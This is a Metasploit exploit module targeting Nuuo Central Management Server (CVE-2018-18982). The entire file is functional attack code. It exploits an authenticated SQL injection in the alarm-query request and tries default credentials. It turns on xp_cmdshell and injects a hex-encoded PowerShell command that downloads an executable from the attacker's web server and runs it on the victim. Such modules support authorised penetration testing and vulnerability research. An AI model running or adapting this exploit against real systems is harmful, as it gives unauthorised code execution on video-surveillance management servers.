## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::Nuuo include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi', 'Description' => %q{ The Nuuo Central Management Server allows an authenticated user to query the state of the alarms. This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is installed by default, xp_cmdshell can be enabled and abused to achieve code execution. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'CVE', '2018-18982' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground 'Targets' => [ [ 'Nuuo Central Management Server <= v2.10.0', {} ], ], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK ], 'Stability' => UNKNOWN_STABILITY, 'Reliability' => UNKNOWN_RELIABILITY }, 'Privileged' => false, # we run as NETWORK_SERVICE 'DisclosureDate' => '2018-10-11', 'DefaultTarget' => 0 ) ) register_options [ Opt::RPORT(5180), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]), OptString.new('URIPATH', [true, 'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"]) ] end def inject_sql(sql) res = ncs_send_request({ 'method' => 'GETOPENALARM', 'user_session' => user_session, 'device_id' => "#{rand_text_numeric(4)}", 'source_server' => "';#{sql};-- ", 'last_one' => "#{rand_text_numeric(4)}" }) end # Handle incoming requests from the server def on_request_uri(cli, request) unless @pl print_error("A request came in, but the payload wasn't ready yet!") return end print_good('Sending the payload to CMS...') send_response(cli, @pl) Rex.sleep(3) print_status('Executing shell...') inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\"")) register_file_for_cleanup("c:/windows/temp/#{@filename}") end def create_hex_cmd(cmd) var = rand_text_alpha(2) hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x" cmd.each_byte { |b| hex_cmd << b.to_i.to_s(16) } hex_cmd << "; exec (@#{var})" end def primer # we need to roll our own here instead of using the MSSQL mixins # (tried that and it doesn't work) service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}" print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}") @filename = "#{rand_text_alpha_lower(8..10)}.exe" ps1 = "#{rand_text_alpha_lower(8..10)}.ps1" download_pl = %{xp_cmdshell } download_pl << %{'cd C:\\windows\\temp\\ && } download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && } download_pl << %{echo $url = "#{service_url}" >> #{ps1} && } download_pl << %{echo $file = "#{@filename}" >> #{ps1} && } download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && } download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'} print_status('Injecting PowerShell payload') inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl)) register_file_for_cleanup("c:/windows/temp/#{ps1}") end def exploit connect ncs_login fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS') unless user_session @pl = generate_payload_exe # do not use SSL ssl = datastore['SSL'] datastore['SSL'] = false begin Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error datastore['SSL'] = ssl end end end